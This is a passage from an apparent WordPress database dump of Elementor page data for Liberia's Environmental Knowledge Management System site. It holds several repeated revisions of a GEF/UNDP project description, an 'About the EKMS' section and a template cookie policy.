here is not for the project to take on more than the Environmental Protection Agency can absorb, but rather, through the process of project execution, learn how to formulate better plans and make better decisions regarding the global environment within the framework of their institutional mandates. That is, this project places a premium on address institutional sustainability by emphasizing the execution of the project through a wide range of learning-by-doing exercises by the EPA. This will require that they reach out of other government ministries and agencies to meet complementary and shared mandates as well as to effectively negotiate resolution of real or perceived conflicts of interests that come about through Rio Convention mainstreaming.<\\/p>\\n<h4>B.2 Selected Scenario<\\/h4>\\n<p>This project is in line with the GEF-6 CCCD Strategy objective 1, 3, and 5 which call for countries to: a) integrate global environmental needs into management information systems and monitoring, b) integrate MEA provisions into national policy, legislative, and regulatory frameworks, and c) update NCSAs, respectively.<\\/p>\\n<p>The uniqueness of this project is centered on its cross-cutting nature. Other projects currently under implementation focus on strengthening targeted capacities under one of the three Rio Conventions, and thus have a relatively narrower system boundary than the CCCD programme approach. In the absence of the CCCD project, there remains likelihood that Liberia would not realize its full potential for sustainable development due to limited coordination and decentralization. Additionally, it is likely that environmental management in Liberia would continue to focus on traditionally narrow constructs.<\\/p>\\n<h4>B.3 Knowledge Management<\\/h4>\\n<p>This project is part of a portfolio of capacity building interventions in Liberia that encourages regional cooperation and knowledge and information exchanges. Partnerships and collaboration will also catalyze the transfer of knowledge and competencies among actors and stakeholders. Lessons learned from other projects will be included, as appropriate (for example, in the training programmes and the knowledge management system). This project also contains specific activities to increase the use and sharing of knowledge, and to strengthen critical thinking in understanding the implications of the global environment towards the pursuit of sustainable development. These include a series of learning-by-doing workshops and public dialogues among a diverse set of stakeholders. Component one focuses on establishing a system for collecting and sharing information and data between the institutions for better environmental management and the fulfillment of the obligations of the Rio Conventions (an EKMS).<\\/p>\\n<p>The system that the project developed is the ideal platform to share lessons learned and experiences with the main stakeholders of environmental information and knowledge. Universities and research centers will be at the center of the information and knowledge management and will ensure the integration of innovative scientific and technical information into the project setup and into other baseline initiatives.<\\/p>\\n<p>The project\\u2019s approach to knowledge management is consistent with the International Resource Panel Report on Policy Coherence of the Sustainable Development Goals which emphasizes the need for developing widespread awareness and creating and disseminating decision support tools.<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bcde0a7\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ee75b34\"}],\"structure\":\"20\"},\"elements\":[{\"id\":\"71ce863\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f710f0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5403a84\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"5a46832\"}]},\"elements\":[{\"id\":\"9ac7a19\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"25aa8f3\",\"elType\":\"widget\",\"settings\":{\"title\":\"What does the EKMS include?\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9c544f7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<!-- wp:paragraph -->\\n<p>The Environmental Knowledge Management System (EKMS) is an integrated online knowledge platform which strive to draw on and complement a growing agenda on the Rio Conventions within the Natural Resource Management Sector and external partners to scale up environmental initiatives.<\\/p>\\n<!-- \\/wp:paragraph -->\\n\\n<!-- wp:paragraph -->\\n<p>The EKMS provides free and open access to information from key government and other institutions in Liberia relating to the implementation of the Rio Conventions \\u2013 The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. The EKMS is deployed under the supervision of Environmental Protection Agency (EPA) in collaboration with twelve relevant government institutions. Information access on this platform include reports, publications, case studies, tools and guidelines, institution\\u2019s technical documents, and other related materials.<\\/p>\\n<!-- \\/wp:paragraph -->\\n\\n<!-- wp:paragraph -->\\n<p>Additionally, the EKMS provides a platform for government institutions and other contributors to share latest blogs, news and stories related to the Rio Conventions implementation process.<\\/p>\\n<!-- \\/wp:paragraph -->\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"51302d0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Acknowledgement\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5d55e03\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The EPA gratefully acknowledges financial support from the Global Environmental Facility (GEF), through the United Nations Development Programme (UNDP), for the development of this Environmental Knowledge Management System (EKMS).<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(4232,429,'_elementor_controls_usage','a:0:{}'),(4233,429,'_elementor_edit_mode','builder'),(4234,429,'_elementor_template_type','wp-page'),(4235,429,'_elementor_version','2.7.5'),(4236,429,'_wp_page_template','default'),(4237,429,'_elementor_data','[{\"id\":\"2ca8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c9f4c2b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"63c1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9149b81\",\"elType\":\"widget\",\"settings\":{\"title\":\"About the EKMS\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7766\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<!-- wp:paragraph -->\\n<p>The Environmental Knowledge Management System (EKMS) is an integrated online knowledge platform which strive to draw on and complement a growing agenda on the Rio Conventions within the Natural Resource Management Sector and external partners to scale up environmental initiatives.<\\/p>\\n<!-- \\/wp:paragraph -->\\n\\n<!-- wp:paragraph -->\\n<p>The EKMS provides free and open access to information from key government and other institutions in Liberia relating to the implementation of the Rio Conventions \\u2013 The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. The EKMS is deployed under the supervision of Environmental Protection Agency (EPA) in collaboration with twelve relevant government institutions. Information access on this platform include reports, publications, case studies, tools and guidelines, institution\\u2019s technical documents, and other related materials.<\\/p>\\n<!-- \\/wp:paragraph -->\\n\\n<!-- wp:paragraph -->\\n<p>Additionally, the EKMS provides a platform for government institutions and other contributors to share latest blogs, news and stories related to the Rio Conventions implementation process.<\\/p>\\n<!-- \\/wp:paragraph -->\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(4240,430,'_elementor_edit_mode','builder'),(4241,430,'_elementor_template_type','wp-page'),(4242,430,'_elementor_version','2.7.5'),(4243,430,'_wp_page_template','default'),(4244,430,'_elementor_data','[{\"id\":\"2ca8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c9f4c2b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"63c1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9149b81\",\"elType\":\"widget\",\"settings\":{\"title\":\"About the EKMS\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7766\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<!-- wp:paragraph -->\\n<p>The Environmental Knowledge Management System (EKMS) is an integrated online knowledge platform which strive to draw on and complement a growing agenda on the Rio Conventions within the Natural Resource Management Sector and external partners to scale up environmental initiatives.<\\/p>\\n<!-- \\/wp:paragraph -->\\n\\n<!-- wp:paragraph -->\\n<p>The EKMS provides free and open access to information from key government and other institutions in Liberia relating to the implementation of the Rio Conventions \\u2013 The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. The EKMS is deployed under the supervision of Environmental Protection Agency (EPA) in collaboration with twelve relevant government institutions. Information access on this platform include reports, publications, case studies, tools and guidelines, institution\\u2019s technical documents, and other related materials.<\\/p>\\n<!-- \\/wp:paragraph -->\\n\\n<!-- wp:paragraph -->\\n<p>Additionally, the EKMS provides a platform for government institutions and other contributors to share latest blogs, news and stories related to the Rio Conventions implementation process.<\\/p>\\n<!-- \\/wp:paragraph -->\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(4248,431,'_elementor_edit_mode','builder'),(4249,431,'_elementor_template_type','wp-page'),(4250,431,'_elementor_version','2.7.5'),(4251,431,'_wp_page_template','default'),(4252,431,'_elementor_data','[{\"id\":\"2ca8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c9f4c2b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"63c1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9149b81\",\"elType\":\"widget\",\"settings\":{\"title\":\"About the EKMS\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7766\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<!-- wp:paragraph -->\\n<p>The Environmental Knowledge Management System (EKMS) is an integrated online knowledge platform which strive to draw on and complement a growing agenda on the Rio Conventions within the Natural Resource Management Sector and external partners to scale up environmental initiatives.<\\/p>\\n<!-- \\/wp:paragraph -->\\n\\n<!-- wp:paragraph -->\\n<p>The EKMS provides free and open access to information from key government and other institutions in Liberia relating to the implementation of the Rio Conventions \\u2013 The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. The EKMS is deployed under the supervision of Environmental Protection Agency (EPA) in collaboration with twelve relevant government institutions. Information access on this platform include reports, publications, case studies, tools and guidelines, institution\\u2019s technical documents, and other related materials.<\\/p>\\n<!-- \\/wp:paragraph -->\\n\\n<!-- wp:paragraph -->\\n<p>Additionally, the EKMS provides a platform for government institutions and other contributors to share latest blogs, news and stories related to the Rio Conventions implementation process.<\\/p>\\n<!-- \\/wp:paragraph -->\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(4256,432,'_elementor_edit_mode','builder'),(4257,432,'_elementor_template_type','wp-page'),(4258,432,'_elementor_version','2.7.5'),(4259,432,'_wp_page_template','default'),(4260,432,'_elementor_data','[{\"id\":\"2ca8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c9f4c2b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"63c1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9149b81\",\"elType\":\"widget\",\"settings\":{\"title\":\"About the EKMS\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7766\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<!-- wp:paragraph -->\\n<p>The Environmental Knowledge Management System (EKMS) is an integrated online knowledge platform which strive to draw on and complement a growing agenda on the Rio Conventions within the Natural Resource Management Sector and external partners to scale up environmental initiatives.<\\/p>\\n<!-- \\/wp:paragraph -->\\n\\n<!-- wp:paragraph -->\\n<p>The EKMS provides free and open access to information from key government and other institutions in Liberia relating to the implementation of the Rio Conventions \\u2013 The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. The EKMS is deployed under the supervision of Environmental Protection Agency (EPA) in collaboration with twelve relevant government institutions. Information access on this platform include reports, publications, case studies, tools and guidelines, institution\\u2019s technical documents, and other related materials.<\\/p>\\n<!-- \\/wp:paragraph -->\\n\\n<!-- wp:paragraph -->\\n<p>Additionally, the EKMS provides a platform for government institutions and other contributors to share latest blogs, news and stories related to the Rio Conventions implementation process.<\\/p>\\n<!-- \\/wp:paragraph -->\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(4261,432,'_elementor_controls_usage','a:4:{s:7:\"heading\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:1;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:1:{s:11:\"title_color\";i:1;}}}}s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:1:{s:10:\"text_color\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:1;}}}}}'),(4263,68,'rank_math_focus_keyword','EKMS,Enviroment,System,Liberia,EPA'),(4264,102,'rank_math_permalink','cookies-privacy-policy'),(4265,102,'ofc_enable_fullscreen','disable'),(4266,102,'ofc_fullscreen_nav','enable'),(4267,102,'ofc_fullscreen_nav_pos','right'),(4268,102,'osh_disable_topbar_sticky','default'),(4269,102,'osh_disable_header_sticky','default'),(4270,102,'osh_sticky_header_style','default'),(4271,102,'_elementor_edit_mode','builder'),(4272,102,'_elementor_template_type','wp-page'),(4273,102,'_elementor_version','2.7.5'),(4274,102,'_wp_page_template','default'),(4275,102,'_elementor_data','[{\"id\":\"f41560c\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"81ad8aa\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"c2af956\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8dc9f7b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Cookie Policy for Environmental Knowledge Management System\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e5d7f54\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-size: 15px;\\\">This is the Cookie Policy for Environmental Knowledge Management System, accessible from <\\/span><a style=\\\"font-size: 15px; background-color: #ffffff;\\\" href=\\\"https:\\/\\/ekmsliberia.info\\\">https:\\/\\/ekmsliberia.info<\\/a><\\/p><h2><strong>What Are Cookies<\\/strong><\\/h2><p>As is common practice with almost all professional websites this site uses cookies, which are tiny files that are downloaded to your computer, to improve your experience. This page describes what information they gather, how we use it and why we sometimes need to store these cookies. We will also share how you can prevent these cookies from being stored however this may downgrade or \'break\' certain elements of the sites functionality.<\\/p><p>For more general information on cookies see the Wikipedia article on HTTP Cookies.<\\/p><h2><strong>How We Use Cookies<\\/strong><\\/h2><p>We use cookies for a variety of reasons detailed below. Unfortunately in most cases there are no industry standard options for disabling cookies without completely disabling the functionality and features they add to this site. It is recommended that you leave on all cookies if you are not sure whether you need them or not in case they are used to provide a service that you use.<\\/p><h2><strong>Disabling Cookies<\\/strong><\\/h2><p>You can prevent the setting of cookies by adjusting the settings on your browser (see your browser Help for how to do this). Be aware that disabling cookies will affect the functionality of this and many other websites that you visit. Disabling cookies will usually result in also disabling certain functionality and features of the this site. Therefore it is recommended that you do not disable cookies.<\\/p><h2><strong>The Cookies We Set<\\/strong><\\/h2><ul><li><p>Account related cookies<\\/p><p>If you create an account with us then we will use cookies for the management of the signup process and general administration. These cookies will usually be deleted when you log out however in some cases they may remain afterwards to remember your site preferences when logged out.<\\/p><\\/li><li><p>Login related cookies<\\/p><p>We use cookies when you are logged in so that we can remember this fact. This prevents you from having to log in every single time you visit a new page. These cookies are typically removed or cleared when you log out to ensure that you can only access restricted features and areas when logged in.<\\/p><\\/li><li><p>Email newsletters related cookies<\\/p><p>This site offers newsletter or email subscription services and cookies may be used to remember if you are already registered and whether to show certain notifications which might only be valid to subscribed\\/unsubscribed users.<\\/p><\\/li><li><p>Forms related cookies<\\/p><p>When you submit data to through a form such as those found on contact pages or comment forms cookies may be set to remember your user details for future correspondence.<\\/p><\\/li><li><p>Site preferences cookies<\\/p><p>In order to provide you with a great experience on this site we provide the functionality to set your preferences for how this site runs when you use it. In order to remember your preferences we need to set cookies so that this information can be called whenever you interact with a page is affected by your preferences.<\\/p><\\/li><\\/ul><h2><strong>Third Party Cookies<\\/strong><\\/h2><p>In some special cases we also use cookies provided by trusted third parties. The following section details which third party cookies you might encounter through this site.<\\/p><ul><li><p>This site uses Google Analytics which is one of the most widespread and trusted analytics solution on the web for helping us to understand how you use the site and ways that we can improve your experience. These cookies may track things such as how long you spend on the site and the pages that you visit so we can continue to produce engaging content.<\\/p><p>For more information on Google Analytics cookies, see the official Google Analytics page.<\\/p><\\/li><li><p>From time to time we test new features and make subtle changes to the way that the site is delivered. When we are still testing new features these cookies may be used to ensure that you receive a consistent experience whilst on the site whilst ensuring we understand which optimisations our users appreciate the most.<\\/p><\\/li><li><p>We also use social media buttons and\\/or plugins on this site that allow you to connect with your social network in various ways. For these to work the following social media sites including; {List the social networks whose features you have integrated with your site?:12}, will set cookies through our site which may be used to enhance your profile on their site or contribute to the data they hold for various purposes outlined in their respective privacy policies.<\\/p><\\/li><\\/ul><p><strong>More Information<\\/strong><\\/p><p>Hopefully that has clarified things for you and as was previously mentioned if there is something that you aren\'t sure whether you need or not it\'s usually safer to leave cookies enabled in case it does interact with one of the features you use on our site.\\u00a0<\\/p><p>However if you are still looking for more information then you can contact us through one of our preferred contact methods:<\\/p><ul><li>Email: <a href=\\\"mailto:contact@ekmsliberia.info\\\">contact@ekmsliberia.info<\\/a><\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(4276,433,'_elementor_controls_usage','a:0:{}'),(4277,433,'_elementor_edit_mode','builder'),(4278,433,'_elementor_template_type','wp-page'),(4279,433,'_elementor_version','2.7.5'),(4280,433,'_wp_page_template','default'),(4281,433,'_elementor_data','[{\"id\":\"f41560c\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"81ad8aa\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"c2af956\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e5d7f54\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-size: 28px;\\\">Cookie Policy for Environmental Knowledge Management System<\\/span><\\/p><p>This is the Cookie Policy for Environmental Knowledge Management System, accessible from <a href=\\\"https:\\/\\/ekmsliberia.info\\\">https:\\/\\/ekmsliberia.info<\\/a><\\/p><h2><strong>What Are Cookies<\\/strong><\\/h2><p>As is common practice with almost all professional websites this site uses cookies, which are tiny files that are downloaded to your computer, to improve your experience. This page describes what information they gather, how we use it and why we sometimes need to store these cookies. We will also share how you can prevent these cookies from being stored however this may downgrade or \'break\' certain elements of the sites functionality.<\\/p><p>For more general information on cookies see the Wikipedia article on HTTP Cookies.<\\/p><h2><strong>How We Use Cookies<\\/strong><\\/h2><p>We use cookies for a variety of reasons detailed below. Unfortunately in most cases there are no industry standard options for disabling cookies without completely disabling the functionality and features they add to this site. It is recommended that you leave on all cookies if you are not sure whether you need them or not in case they are used to provide a service that you use.<\\/p><h2><strong>Disabling Cookies<\\/strong><\\/h2><p>You can prevent the setting of cookies by adjusting the settings on your browser (see your browser Help for how to do this). Be aware that disabling cookies will affect the functionality of this and many other websites that you visit. Disabling cookies will usually result in also disabling certain functionality and features of the this site. Therefore it is recommended that you do not disable cookies.<\\/p><h2><strong>The Cookies We Set<\\/strong><\\/h2><ul><li><p>Account related cookies<\\/p><p>If you create an account with us then we will use cookies for the management of the signup process and general administration. These cookies will usually be deleted when you log out however in some cases they may remain afterwards to remember your site preferences when logged out.<\\/p><\\/li><li><p>Login related cookies<\\/p><p>We use cookies when you are logged in so that we can remember this fact. This prevents you from having to log in every single time you visit a new page. These cookies are typically removed or cleared when you log out to ensure that you can only access restricted features and areas when logged in.<\\/p><\\/li><li><p>Email newsletters related cookies<\\/p><p>This site offers newsletter or email subscription services and cookies may be used to remember if you are already registered and whether to show certain notifications which might only be valid to subscribed\\/unsubscribed users.<\\/p><\\/li><li><p>Forms related cookies<\\/p><p>When you submit data to through a form such as those found on contact pages or comment forms cookies may be set to remember your user details for future correspondence.<\\/p><\\/li><li><p>Site preferences cookies<\\/p><p>In order to provide you with a great experience on this site we provide the functionality to set your preferences for how this site runs when you use it. In order to remember your preferences we need to set cookies so that this information can be called whenever you interact with a page is affected by your preferences.<\\/p><\\/li><\\/ul><h2><strong>Third Party Cookies<\\/strong><\\/h2><p>In some special cases we also use cookies provided by trusted third parties. The following section details which third party cookies you might encounter through this site.<\\/p><ul><li><p>This site uses Google Analytics which is one of the most widespread and trusted analytics solution on the web for helping us to understand how you use the site and ways that we can improve your experience. These cookies may track things such as how long you spend on the site and the pages that you visit so we can continue to produce engaging content.<\\/p><p>For more information on Google Analytics cookies, see the official Google Analytics page.<\\/p><\\/li><li><p>From time to time we test new features and make subtle changes to the way that the site is delivered. When we are still testing new features these cookies may be used to ensure that you receive a consistent experience whilst on the site whilst ensuring we understand which optimisations our users appreciate the most.<\\/p><\\/li><li><p>We also use social media buttons and\\/or plugins on this site that allow you to connect with your social network in various ways. For these to work the following social media sites including; {List the social networks whose features you have integrated with your site?:12}, will set cookies through our site which may be used to enhance your profile on their site or contribute to the data they hold for various purposes outlined in their respective privacy policies.<\\/p><\\/li><\\/ul><p><strong>More Information<\\/strong><\\/p><p>Hopefully that has clarified things for you and as was previously mentioned if there is something that you aren\'t sure whether you need or not it\'s usually safer to leave cookies enabled in case it does interact with one of the features you use on our site.\\u00a0<\\/p><p>However if you are still looking for more information then you can contact us through one of our preferred contact methods:<\\/p><ul><li>Email: <a href=\\\"mailto:contact@ekmsliberia.info\\\">contact@ekmsliberia.info<\\/a><\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(4284,434,'_elementor_edit_mode','builder'),(4285,434,'_elementor_template_type','wp-page'),(4286,434,'_elementor_version','2.7.5'),(4287,434,'_wp_page_template','default'),(4288,434,'_elementor_data','[{\"id\":\"f41560c\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"81ad8aa\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"c2af956\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e5d7f54\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-size: 15px;\\\">This is the Cookie Policy for Environmental Knowledge Management System, accessible from <\\/span><a style=\\\"font-size: 15px; background-color: #ffffff;\\\" href=\\\"https:\\/\\/ekmsliberia.info\\\">https:\\/\\/ekmsliberia.info<\\/a><\\/p><h2><strong>What Are Cookies<\\/strong><\\/h2><p>As is common practice with almost all professional websites this site uses cookies, which are tiny files that are downloaded to your computer, to improve your experience. This page describes what information they gather, how we use it and why we sometimes need to store these cookies. We will also share how you can prevent these cookies from being stored however this may downgrade or \'break\' certain elements of the sites functionality.<\\/p><p>For more general information on cookies see the Wikipedia article on HTTP Cookies.<\\/p><h2><strong>How We Use Cookies<\\/strong><\\/h2><p>We use cookies for a variety of reasons detailed below. Unfortunately in most cases there are no industry standard options for disabling cookies without completely disabling the functionality and features they add to this site. It is recommended that you leave on all cookies if you are not sure whether you need them or not in case they are used to provide a service that you use.<\\/p><h2><strong>Disabling Cookies<\\/strong><\\/h2><p>You can prevent the setting of cookies by adjusting the settings on your browser (see your browser Help for how to do this). Be aware that disabling cookies will affect the functionality of this and many other websites that you visit. Disabling cookies will usually result in also disabling certain functionality and features of the this site. Therefore it is recommended that you do not disable cookies.<\\/p><h2><strong>The Cookies We Set<\\/strong><\\/h2><ul><li><p>Account related cookies<\\/p><p>If you create an account with us then we will use cookies for the management of the signup process and general administration. These cookies will usually be deleted when you log out however in some cases they may remain afterwards to remember your site preferences when logged out.<\\/p><\\/li><li><p>Login related cookies<\\/p><p>We use cookies when you are logged in so that we can remember this fact. This prevents you from having to log in every single time you visit a new page. These cookies are typically removed or cleared when you log out to ensure that you can only access restricted features and areas when logged in.<\\/p><\\/li><li><p>Email newsletters related cookies<\\/p><p>This site offers newsletter or email subscription services and cookies may be used to remember if you are already registered and whether to show certain notifications which might only be valid to subscribed\\/unsubscribed users.<\\/p><\\/li><li><p>Forms related cookies<\\/p><p>When you submit data to through a form such as those found on contact pages or comment forms cookies may be set to remember your user details for future correspondence.<\\/p><\\/li><li><p>Site preferences cookies<\\/p><p>In order to provide you with a great experience on this site we provide the functionality to set your preferences for how this site runs when you use it. In order to remember your preferences we need to set cookies so that this information can be called whenever you interact with a page is affected by your 